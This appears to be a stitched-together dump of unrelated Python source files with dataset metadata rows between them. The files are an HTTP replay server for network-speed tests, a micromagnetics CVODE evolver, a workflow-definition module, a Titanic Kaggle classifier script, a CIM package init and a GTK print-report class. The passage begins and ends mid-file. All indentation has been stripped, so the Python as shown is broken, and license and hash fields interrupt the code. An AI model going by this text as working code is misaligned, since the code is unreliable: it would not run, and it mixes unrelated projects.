"""Error raised when waiting for an HTTP response timed out."""
def __init__(self, port):
super(HttpWaitTimeoutError, self).__init__(
'Wait timeout exceeded when waiting for a response on local port ' +
str(port))
def create_replay_server_manager(replays, ndt_server_fqdn):
"""Creates a replay server wrapped in a server manager."""
return HttpServerManager(ReplayHTTPServer(replays, ndt_server_fqdn))
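# Example lifecycle (hypothetical replay data; HttpResponse instances come
# from the sibling http_response module):
#   manager = create_replay_server_manager(replays, 'ndt.example.com')
#   manager.start()
#   ... point an NDT client at http://localhost:<manager.port>/ ...
#   manager.close()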
class ReplayHTTPServer(BaseHTTPServer.HTTPServer):
"""HTTP server that replays saved HTTP responses.
Attributes:
port: Port on which the server is listening for connections.
replays: A dictionary of HttpResponse instances, keyed by relative URL.
"""
def __init__(self, replays, ndt_server_fqdn):
"""Creates a new ReplayHTTPServer.
Args:
replays: A dictionary of HttpResponse instances, keyed by relative
URL.
ndt_server_fqdn: FQDN of target NDT server.
"""
BaseHTTPServer.HTTPServer.__init__(self, ('', 0), _ReplayRequestHandler)
self._port = self.server_address[1]
self._replays = replays
self._rewrite_mlabns_replays(ndt_server_fqdn)
self._rewrite_localhost_ips()
@property
def port(self):
return self._port
@property
def replays(self):
return self._replays
def _rewrite_mlabns_replays(self, ndt_server_fqdn):
"""Rewrites mlab-ns responses to point to a custom NDT server.
Finds all mlab-ns responses in the replays and replaces the responses
with a synthetic mlab-ns response that points to an NDT server with the
given FQDN.
Args:
ndt_server_fqdn: Target NDT server to use in rewritten mlab-ns
responses.
"""
mlabns_response_data = json.dumps({'city': 'Test_TT',
'url':
'http://%s:7123' % ndt_server_fqdn,
'ip': ['1.2.3.4'],
'fqdn': ndt_server_fqdn,
'site': 'xyz99',
'country': 'US'})
paths = ['/ndt', '/ndt_ssl']
for path in paths:
if path in self._replays:
original_response = self._replays[path]
self._replays[path] = http_response.HttpResponse(
original_response.response_code, original_response.headers,
mlabns_response_data)
def _rewrite_localhost_ips(self):
for path, original_response in self._replays.iteritems():
# Replace all instances of 127.0.0.1 with localhost and the port that
# our parent server is listening on.
rewritten_data = original_response.data.replace(
'127.0.0.1', 'localhost:%d' % self._port)
# Update the Content-Length header since we have changed the
# content.
headers = original_response.headers
headers['content-length'] = len(rewritten_data)
self._replays[path] = http_response.HttpResponse(
original_response.response_code, headers, rewritten_data)
class _ReplayRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""Request handler for replaying saved HTTP responses."""
def __init__(self, request, client_address, server):
self._replays = server.replays
self._server_port = server.port
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(
self, request, client_address, server)
def do_GET(self):
"""Handle an HTTP GET request.
Serve an HTTP GET request by replaying a stored response. If there is
no matching response, serve a 404 and log a message.
"""
try:
response = self._replays[self.path]
except KeyError:
logger.info('No stored result for %s', self.path)
self.send_error(404, 'File not found')
return
self.send_response(response.response_code)
for header, value in response.headers.iteritems():
self.send_header(header, value)
self.end_headers()
self.wfile.write(response.data)
def log_message(self, format, *args):
# Don't log messages because it creates too much logging noise.
pass
class HttpServerManager(object):
"""A wrapper for HTTP server instances to support asynchronous running.
Wraps HTTP server instances so that callers can easily start the server
asynchronously with assurance that the server has begun serving.
Attributes:
port: The local TCP port on which the child server is listening for
connections.
"""
def __init__(self, http_server):
"""Creates a new HttpServerManager.
Args:
http_server: An HTTP server instance that has a "port" attribute and
a "serve_forever" function.
"""
self._http_server = http_server
self._http_server_thread = None
@property
def port(self):
return self._http_server.port
def start(self):
"""Starts the child HTTP server.
Starts the child HTTP server and blocks until the server begins serving
HTTP requests. After calling start(), the owner of the instance is
responsible for calling close() to release the child server's resources.
"""
self._start_http_server_async()
_wait_for_local_http_response(self._http_server.port)
def _start_http_server_async(self):
"""Starts the child HTTP server in a background thread."""
self._http_server_thread = threading.Thread(
target=self._http_server.serve_forever)
self._http_server_thread.daemon = True
self._http_server_thread.start()
def close(self):
"""Shut down the child HTTP server."""
if self._http_server_thread:
self._http_server.shutdown()
self._http_server_thread.join()
def _wait_for_local_http_response(port):
"""Wait for a local port to begin responding to HTTP requests."""
# Maximum number of seconds to wait for a port to begin responding to
# HTTP requests.
max_wait_seconds = 5
start_time = datetime.datetime.now(tz=pytz.utc)
while (datetime.datetime.now(tz=pytz.utc) - start_time
).total_seconds() < max_wait_seconds:
try:
urllib.urlopen('http://localhost:%d/' % port)
return
except IOError:
pass
raise HttpWaitTimeoutError(port)
|
apache-2.0
| 6,865,305,335,375,241,000 | 34.330275 | 81 | 0.624253 | false |
MicroMagnum/MicroMagnum
|
src/magnum/evolver/cvode.py
|
1
|
1850
|
# Copyright 2012 by the Micromagnum authors.
#
# This file is part of MicroMagnum.
#
# MicroMagnum is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# MicroMagnum is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with MicroMagnum. If not, see <http://www.gnu.org/licenses/>.
from magnum.mesh import VectorField
from .evolver import Evolver
from magnum.llgDiffEq import *
import magnum.magneto as m
class Cvode(Evolver):
def __init__(self, mesh, eps_abs, eps_rel, step_size, newton_method):
super(Cvode, self).__init__(mesh)
self.eps_abs = eps_abs
self.eps_rel = eps_rel
self.step_size = step_size
self.initialized = False
self.newton_method = newton_method
def initialize(self, state):
self.llg = LlgDiffEq(state)
self.cvode = m.Cvode(self.llg, self.eps_abs, self.eps_rel, self.newton_method)
state.h = self.step_size
self.initialized = True
def evolve(self, state, t_max):
if not self.initialized:
self.initialize(state)
# But: Don't overshoot past t_max!
if state.t + state.h > t_max:
state.h = t_max - state.t # make h_try smaller.
if t_max == 1e100:
t_max = state.t + state.h
t = state.t
# call cvode
self.cvode.evolve(state.t, t_max)
state.t = t_max
state.step += 1
#print(state.substep)
state.substep = 0
state.flush_cache()
state.finish_step()
return state
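# Sketch of intended use (assumptions: a MicroMagnum simulation state with
# t/h attributes, and a newton_method flag as accepted by magneto's Cvode
# binding):
#   evolver = Cvode(mesh, eps_abs=1e-4, eps_rel=1e-4, step_size=1e-13,
#                   newton_method=True)
#   state = evolver.evolve(state, t_max=1e-9)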
|
gpl-3.0
| -6,416,352,454,993,770,000 | 28.365079 | 82 | 0.685405 | false |
Sonblind/orchestra
|
orchestra/workflow.py
|
1
|
8139
|
from importlib import import_module
from django.conf import settings
from orchestra.core.errors import InvalidSlugValue
from orchestra.core.errors import SlugUniquenessError
class Workflow():
"""
Workflows represent execution graphs of human and machine steps.
Attributes:
slug (str):
Unique identifier for the workflow.
name (str):
Human-readable name for the workflow.
description (str):
A longer description of the workflow.
steps (dict):
Steps comprising the workflow.
"""
def __init__(self,
**kwargs):
self.slug = kwargs.get('slug')
if len(self.slug) > 200:
            raise InvalidSlugValue('Slug value should be at most 200 chars')
self.name = kwargs.get('name')
self.description = kwargs.get('description')
self.steps = {}
def add_step(self, step):
"""
Add `step` to the workflow.
Args:
step (orchestra.workflow.Step):
The step to be added.
Returns:
None
Raises:
orchestra.core.errors.InvalidSlugValue:
                Step slug must be at most 200 characters.
orchestra.core.errors.SlugUniquenessError:
Step slug has already been used in this workflow.
"""
if len(step.slug) > 200:
            raise InvalidSlugValue('Slug value should be at most 200 chars')
if step.slug in self.steps:
raise SlugUniquenessError('Slug value already taken')
self.steps[step.slug] = step
def get_steps(self):
"""
Return all steps for the workflow.
Args:
None
Returns:
steps ([orchestra.workflow.Step]):
List of steps for the workflow.
"""
return self.steps.values()
def get_step_slugs(self):
"""
Return all step slugs for the workflow.
Args:
None
Returns:
slugs ([str]):
List of step slugs for the workflow.
"""
return self.steps.keys()
def get_step(self, slug):
"""
Return the specified step from the workflow.
Args:
slug (str):
The slug of the desired step.
Returns:
step (orchestra.workflow.Step):
The specified step from the workflow.
"""
return self.steps[slug]
def get_human_steps(self):
"""
Return steps from the workflow with a human `worker_type`.
Args:
None
Returns:
steps ([orchestra.workflow.Step]):
                Steps from the workflow with a human `worker_type`.
"""
return [step for slug, step in self.steps.items()
if step.worker_type == Step.WorkerType.HUMAN]
def __str__(self):
return self.slug
def __unicode__(self):
return self.slug
class Step():
"""
Steps represent nodes on a workflow execution graph.
Attributes:
slug (str):
Unique identifier for the step.
name (str):
Human-readable name for the step.
description (str):
A longer description of the step.
worker_type (orchestra.workflow.Step.WorkerType):
Indicates whether the policy is for a human or machine.
creation_depends_on ([str]):
Slugs for steps on which this step's creation depends.
submission_depends_on ([str]):
Slugs for steps on which this step's submission depends.
function (function):
Function to execute during step. Should be present only for
            machine tasks.
required_certifications ([str]):
Slugs for certifications required for a worker to pick up
tasks based on this step.
"""
class WorkerType:
"""Specifies whether step is performed by human or machine"""
HUMAN = 0
MACHINE = 1
def __init__(self,
**kwargs):
self.slug = kwargs.get('slug')
self.name = kwargs.get('name')
self.description = kwargs.get('description')
self.worker_type = kwargs.get('worker_type')
self.creation_depends_on = kwargs.get('creation_depends_on') or []
self.submission_depends_on = kwargs.get('submission_depends_on') or []
self.function = kwargs.get('function')
self.required_certifications = kwargs.get(
'required_certifications') or []
# Example: {'policy': 'previously_completed_steps', 'step': ['design']}
self.assignment_policy = (kwargs.get('assignment_policy')
or get_default_policy(self.worker_type,
'assignment_policy'))
# Example: {'policy': 'sampled_review', 'rate': .25, 'max_reviews': 2}
self.review_policy = (kwargs.get('review_policy')
or get_default_policy(self.worker_type,
'review_policy'))
# Example: {'html_blob': 'http://some_url',
# 'javascript_includes': [url1, url2],
# 'css_includes': [url1, url2]}
self.user_interface = kwargs.get('user_interface') or {}
def __str__(self):
return self.slug
def __unicode__(self):
return self.slug
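# Example wiring (hypothetical slugs; assignment and review policies fall back
# to the defaults from get_default_policy):
#   wf = Workflow(slug='article_flow', name='Articles', description='Demo')
#   wf.add_step(Step(slug='write', name='Write',
#                    worker_type=Step.WorkerType.HUMAN))
#   wf.add_step(Step(slug='review', name='Review',
#                    worker_type=Step.WorkerType.HUMAN,
#                    creation_depends_on=['write']))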
def get_workflows():
"""
Return all stored workflows.
Args:
None
Returns:
        workflows (dict):
A dict of all workflows keyed by slug.
"""
workflows = {}
for backend_module, variable in settings.ORCHESTRA_PATHS:
backend_module = import_module(backend_module)
workflow = getattr(backend_module, variable)
if workflow.slug in workflows:
raise SlugUniquenessError('Repeated slug value for workflows.')
workflows[workflow.slug] = workflow
return workflows
def get_workflow_by_slug(slug):
"""
Return the workflow specified by `slug`.
Args:
slug (str):
The slug of the desired workflow.
Returns:
workflow (orchestra.workflow.Workflow):
The corresponding workflow object.
"""
return get_workflows()[slug]
def get_workflow_choices():
"""
Return workflow data formatted as `choices` for a model field.
Args:
None
Returns:
workflow_choices (tuple):
A tuple of tuples containing each workflow slug and
human-readable name.
"""
workflows = get_workflows()
choices = []
for slug, workflow in workflows.items():
choices.append((slug, workflow.name))
return tuple(choices)
def get_step_choices():
"""
Return step data formatted as `choices` for a model field.
Args:
None
Returns:
step_choices (tuple):
A tuple of tuples containing each step slug and
human-readable name.
"""
choices = []
for slug, workflow in iter(get_workflows().items()):
for step in workflow.get_steps():
choices.append((step.slug, step.name))
return tuple(choices)
def get_default_policy(worker_type, policy_name):
"""
Return the default value for a specified policy.
Args:
worker_type (orchestra.workflow.Step.WorkerType):
Indicates whether the policy is for a human or machine.
policy_name (str):
The specified policy identifier.
Returns:
default_policy (dict):
A dict containing the default policy for the worker type and
policy name specified.
"""
default_policies = {
'assignment_policy': {'policy': 'anyone_certified'},
'review_policy': {'policy': 'sampled_review',
'rate': 1,
'max_reviews': 1}
}
if worker_type == Step.WorkerType.HUMAN:
return default_policies[policy_name]
else:
return {}
|
apache-2.0
| -6,444,960,388,937,644,000 | 28.067857 | 79 | 0.566654 | false |
Chaparqanatoos/kaggle-knowledge
|
src/main/python/titanic.py
|
1
|
2524
|
import pandas as pd
import numpy as np
def pre_process(df):
df['Gender'] = df['Sex'].map({'female': 0, 'male': 1}).astype(int)
median_ages = np.zeros((2, 3))
for i in range(0, 2):
for j in range(0, 3):
median_ages[i, j] = df[(df['Gender'] == i) & (df['Pclass'] == j + 1)]['Age'].dropna().median()
df['AgeFill'] = df['Age']
for i in range(0, 2):
for j in range(0, 3):
df.loc[ (df.Age.isnull()) & (df.Gender == i) & (df.Pclass == j + 1), 'AgeFill'] = median_ages[i, j]
df['AgeIsNull'] = pd.isnull(df.Age).astype(int)
df['FamilySize'] = df['SibSp'] + df['Parch']
df['Age*Class'] = df.AgeFill * df.Pclass
df = df.drop(['Name', 'Sex', 'Ticket', 'Cabin', 'Embarked'], axis=1)
df = df.drop(['Age'], axis=1)
df.loc[df.Fare.isnull(), 'Fare'] = df['Fare'].dropna().median()
return df.values
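# Note: pre_process returns a NumPy array. For the training frame the columns
# are [PassengerId, Survived, Pclass, SibSp, Parch, Fare, Gender, AgeFill,
# AgeIsNull, FamilySize, Age*Class]; the test frame has no Survived column,
# which is why the feature slices below differ (2:: for train, 1:: for test).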
# For .read_csv, always use header=0 when you know row 0 is the header row
train_df = pd.read_csv('/home/namukhtar/Datasets/kaggle/titanic/train.csv', header=0)
# print train_df.head(10)
train_data = pre_process(train_df)
test_df = pd.read_csv('/home/namukhtar/Datasets/kaggle/titanic/test.csv', header=0)
# print test_df.head(10)
test_data = pre_process(test_df)
# Import the random forest package
from sklearn.ensemble import RandomForestClassifier
# Create the random forest object which will include all the parameters
# for the fit
forest = RandomForestClassifier(n_estimators=100)
# Fit the training data to the Survived labels and create the decision trees
forest = forest.fit(train_data[0::, 2::], train_data[0::, 1])
# Take the same decision trees and run it on the test data
output = forest.predict(test_data[0::, 1::])
out_df = pd.DataFrame({'PassengerId' : test_data[0::, 0], 'Survived' : output})
out_df["PassengerId"] = out_df["PassengerId"].astype("int")
out_df["Survived"] = out_df["Survived"].astype("int")
out_df.to_csv('titanic-randomforest.csv', index=False)
from sklearn import svm
svc = svm.SVC(kernel='linear')
svc = svc.fit(train_data[0::, 2::], train_data[0::, 1])
# Take the same decision trees and run it on the test data
output = svc.predict(test_data[0::, 1::])
out_df = pd.DataFrame({'PassengerId' : test_data[0::, 0], 'Survived' : output})
out_df["PassengerId"] = out_df["PassengerId"].astype("int")
out_df["Survived"] = out_df["Survived"].astype("int")
out_df.to_csv('titanic-svm.csv', index=False)
|
apache-2.0
| 3,864,201,086,278,969,000 | 32.210526 | 111 | 0.618859 | false |
rwl/PyCIM
|
CIM14/CDPSM/Unbalanced/IEC61968/WiresExt/__init__.py
|
1
|
2312
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""This package contains the information classes that extend IEC61970::Wires package with power system resources required for distribution network modelling, including unbalanced networks.
"""
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.DistributionTransformerWinding import DistributionTransformerWinding
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.DistributionLineSegment import DistributionLineSegment
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.WindingPiImpedance import WindingPiImpedance
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.DistributionTapChanger import DistributionTapChanger
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.PerLengthSequenceImpedance import PerLengthSequenceImpedance
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.TransformerBank import TransformerBank
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.PerLengthPhaseImpedance import PerLengthPhaseImpedance
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.DistributionTransformer import DistributionTransformer
from CIM14.CDPSM.Unbalanced.IEC61968.WiresExt.PhaseImpedanceData import PhaseImpedanceData
nsURI = "http://iec.ch/TC57/2009/CIM-schema-cim14?profile=http://iec.ch/TC57/2007/profile#WiresExt"
nsPrefix = "cimWiresExt"
|
mit
| 5,737,497,561,522,835,000 | 63.222222 | 188 | 0.831315 | false |
yazdan/AmirAccounting
|
amir/printreport.py
|
1
|
35708
|
import pygtk
import gtk
import pango
import cairo
import pangocairo
import logging
import math
import utility
from amirconfig import config
class PrintReport:
def __init__(self, content, cols_width, heading=None):
# self.lines_per_page = 24
self.cell_margin = 4
self.line = 2 #the thinest possible width of lines.
self.row_height = 2 * (config.contentfont + self.cell_margin)
self.header_height = 0
self.heading_height = 35
self.operation = gtk.PrintOperation()
settings = gtk.PrintSettings()
paper_size = gtk.paper_size_new_from_ppd(config.paper_ppd, config.paper_name, config.paper_width, config.paper_height)
self.page_setup = gtk.PageSetup()
self.page_setup.set_paper_size(paper_size)
self.page_setup.set_orientation(config.paper_orientation)
# self.page_setup = gtk.print_run_page_setup_dialog(None, self.page_setup, settings)
self.page_setup.set_top_margin(config.topmargin, gtk.UNIT_POINTS)
self.page_setup.set_bottom_margin(config.botmargin, gtk.UNIT_POINTS)
self.page_setup.set_right_margin(config.rightmargin, gtk.UNIT_POINTS)
self.page_setup.set_left_margin(config.leftmargin, gtk.UNIT_POINTS)
self.operation.set_default_page_setup(self.page_setup)
self.operation.set_unit(gtk.UNIT_POINTS)
self.content = content
tablewidth = self.page_setup.get_page_width(gtk.UNIT_POINTS)
tablewidth -= (len(cols_width) * (self.line + self.cell_margin)) + self.line + (config.rightmargin + config.leftmargin)
self.cols_width = []
for percent in cols_width:
self.cols_width.append(math.floor((percent * tablewidth) / 100))
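        # cols_width arrives as percentages of the printable width; after
        # subtracting rule widths, cell margins and page margins, each
        # entry is converted to absolute points.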
# self.cols_width = cols_width
self.heading = heading
self.operation.connect("begin_print", self.beginPrint)
self.operation.connect("draw-page", self.printPage)
self.type = 0
self.title = ""
self.fields = {}
##self.content = data
def setHeader (self, title, fields):
self.title = title
self.fields = fields
def beginPrint(self, operation, context):
tableheight = self.page_setup.get_page_height(gtk.UNIT_POINTS)
name_lineheight = 2 * config.namefont
header_lineheight = 2 * config.headerfont
tableheight -= (math.floor((len(self.fields) + 1) / 2) * header_lineheight) + (config.topmargin + config.botmargin) + self.heading_height + name_lineheight + (self.cell_margin * 2)
self.lines_per_page = int(math.floor(tableheight / self.row_height))
#Subtract two lines that show "Sum of previous page" and "Sum"
self.lines_per_page -= 2
pages = ((len(self.content) - 1) / self.lines_per_page ) + 1
operation.set_n_pages(pages)
def doPrintJob(self, action):
self.operation.run(action)
def printPage(self, operation, context, page_nr):
self.pangolayout = context.create_pango_layout()
self.cairo_context = context.get_cairo_context()
self.pangolayout.set_width(-1)
self.pangocairo = pangocairo.CairoContext(self.cairo_context)
self.formatHeader()
getattr(self, self.drawfunction)(page_nr)
#self.drawDailyNotebook(page_nr)
def formatHeader(self):
LINE_HEIGHT = 2 * (config.namefont)
# MARGIN = self.page_margin
# cwidth = context.get_width()
cwidth = self.page_setup.get_page_width(gtk.UNIT_POINTS)
logging.info("Paper width: " + str(cwidth))
cr = self.cairo_context
fontsize = config.namefont
fdesc = pango.FontDescription("Sans")
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
if self.title != "":
self.pangolayout.set_text(self.title)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_CENTER)
cr.move_to ((cwidth - width / pango.SCALE) / 2, (LINE_HEIGHT - (height/ pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
# cr.move_to((cwidth + width / pango.SCALE) / 2, LINE_HEIGHT + config.topmargin)
# cr.line_to((cwidth - width / pango.SCALE) / 2, LINE_HEIGHT + config.topmargin)
cr.move_to((cwidth + width / pango.SCALE) / 2, LINE_HEIGHT + self.cell_margin)
cr.line_to((cwidth - width / pango.SCALE) / 2, LINE_HEIGHT + self.cell_margin)
addh = LINE_HEIGHT + self.cell_margin
LINE_HEIGHT = 2 * config.headerfont
fontsize = config.headerfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
flag = 1
for k,v in self.fields.items():
self.pangolayout.set_text(k + ": " + v)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_CENTER)
if flag == 1:
addh += LINE_HEIGHT
cr.move_to (cwidth - (width / pango.SCALE) - config.rightmargin, addh - (height/ pango.SCALE)/2)
flag = 0
else:
cr.move_to ((width / pango.SCALE) + config.leftmargin, addh - (height/ pango.SCALE)/2)
flag = 1
self.pangocairo.show_layout(self.pangolayout)
cr.stroke()
self.header_height = addh + 8
def drawDailyNotebook(self, page_nr):
# RIGHT_EDGE = 570 #(table width + PAGE_MARGIN)
RIGHT_EDGE = self.page_setup.get_page_width(gtk.UNIT_POINTS) - config.rightmargin
HEADER_HEIGHT = self.header_height
HEADING_HEIGHT = self.heading_height
# PAGE_MARGIN = self.page_margin
MARGIN = self.cell_margin
TABLE_TOP = HEADER_HEIGHT + HEADING_HEIGHT + self.cell_margin
ROW_HEIGHT = self.row_height
LINE = self.line
cr = self.cairo_context
fontsize = config.contentfont
fdesc = pango.FontDescription("Sans")
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
# #Table top line
# cr.move_to(PAGE_MARGIN, TABLE_TOP)
# cr.line_to(RIGHT_EDGE, TABLE_TOP)
self.drawTableHeading()
#Draw table data
rindex = page_nr * self.lines_per_page
offset = 0
right_txt = RIGHT_EDGE
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
self.pangolayout.set_text("----")
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
for i in range(0, 3):
right_txt -= MARGIN + LINE
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[i]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(_("Sum of previous page"))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[3]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
if page_nr == 0:
self.pangolayout.set_text(utility.showNumber(0))
self.debt_sum = 0
else:
self.pangolayout.set_text(utility.showNumber(self.debt_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[4]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
right_txt -= MARGIN + LINE
if page_nr == 0:
self.pangolayout.set_text(utility.showNumber(0))
self.credit_sum = 0
else:
self.pangolayout.set_text(utility.showNumber(self.credit_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[5]
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
addh= ROW_HEIGHT + TABLE_TOP
try:
while (offset < self.lines_per_page):
row = self.content[rindex + offset]
cr.move_to(RIGHT_EDGE, addh)
cr.line_to(RIGHT_EDGE, addh+ROW_HEIGHT)
right_txt = RIGHT_EDGE
dindex = 0
for data in row:
right_txt -= MARGIN+LINE
if dindex == 3:
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
else:
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[dindex]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
dindex += 1
self.debt_sum += int(row[4].replace(",", ""))
self.credit_sum += int(row[5].replace(",", ""))
addh += ROW_HEIGHT
offset += 1
except IndexError:
pass
right_txt = RIGHT_EDGE
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
self.pangolayout.set_text("----")
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
for i in range(0, 3):
right_txt -= MARGIN + LINE
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[i]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize -= 1
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(_("Sum"))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[3]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
fontsize = config.contentfont
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.pangolayout.set_text(utility.showNumber(self.debt_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[4]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
right_txt -= MARGIN + LINE
self.pangolayout.set_text(utility.showNumber(self.credit_sum))
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[5]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
#Table top line
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(RIGHT_EDGE, TABLE_TOP)
#Table bottom line
cr.move_to(right_txt, addh + ROW_HEIGHT)
cr.line_to(RIGHT_EDGE, addh + ROW_HEIGHT)
cr.stroke()
def drawSubjectNotebook(self, page_nr):
# RIGHT_EDGE = 570 #(table width + PAGE_MARGIN)
RIGHT_EDGE = self.page_setup.get_page_width(gtk.UNIT_POINTS) - config.rightmargin
HEADER_HEIGHT = self.header_height
HEADING_HEIGHT = self.heading_height
# PAGE_MARGIN = self.page_margin
MARGIN = self.cell_margin
TABLE_TOP = HEADER_HEIGHT + HEADING_HEIGHT + self.cell_margin
ROW_HEIGHT = self.row_height
LINE = self.line
cr = self.cairo_context
fontsize = config.contentfont
fdesc = pango.FontDescription("Sans")
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
# #Table top line
# cr.move_to(PAGE_MARGIN, TABLE_TOP)
# cr.line_to(RIGHT_EDGE, TABLE_TOP)
self.drawTableHeading()
#Draw table data
rindex = page_nr * self.lines_per_page
offset = 0
right_txt = RIGHT_EDGE
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(right_txt, TABLE_TOP + ROW_HEIGHT)
self.pangolayout.set_text("----")
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
for i in range(0, 2):
right_txt -= MARGIN + LINE
cr.move_to (right_txt -(width / pango.SCALE), TABLE_TOP + (ROW_HEIGHT-(height / pango.SCALE))/2)
